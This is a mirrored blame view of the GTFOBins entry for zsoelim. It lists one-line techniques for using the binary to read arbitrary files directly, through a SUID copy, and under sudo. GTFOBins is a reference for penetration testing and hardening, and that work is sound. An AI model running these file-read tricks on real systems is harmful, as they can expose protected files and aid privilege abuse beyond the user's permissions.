1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/zsoelim.md

17 lines
376 B
Markdown
Raw Normal View History

2020-03-15 04:30:12 +01:00
---
2020-03-15 13:29:39 +01:00
description: The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.
2020-03-15 04:30:12 +01:00
functions:
file-read:
- code: |
LFILE=file_to_read
zsoelim "$LFILE"
suid:
- code: |
LFILE=file_to_read
2020-03-15 13:29:39 +01:00
./zsoelim "$LFILE"
2020-03-15 04:30:12 +01:00
sudo:
- code: |
LFILE=file_to_read
sudo zsoelim "$LFILE"
---